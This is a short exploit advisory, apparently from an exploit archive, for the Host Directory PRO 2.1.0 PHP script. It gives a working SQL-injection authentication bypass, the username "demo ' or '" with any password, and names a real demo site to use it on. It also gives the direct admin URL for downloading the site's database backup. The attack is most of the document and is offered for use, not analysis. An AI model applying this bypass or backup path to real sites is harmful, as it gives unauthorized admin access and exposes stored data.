id: 5311
date: 06/03/2009
title: Host Directory PRO 2.1.0 Remote Database Backup Vulnerability
author: ZoRLu
cves: 

=============================================================
Host Directory PRO 2.1.0 Remote Database Backup Vulnerability
=============================================================


[~] Host Directory Pro Bypass & Backup DB Disc. Multiple Vulns.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  
[~]
[~] Date: 28/03/09
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: New Target Buffer Overflow : ) there is a little time xD
[~]
[~] N0T: Unutulduk mu ?
[~] -----------------------------------------------------------

script:

http://www.phphostdirectoryscript.com/

Bypass for demo:

username: demo ' or '

pass: ZoRLu or dont write anything

http://demo-host-directory-pro.phphostdirectoryscript.com/

Backup DB Disc. for demo:

http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db

[~]----------------------------------------------------------------------



#  0day.today [2023-03-23]  #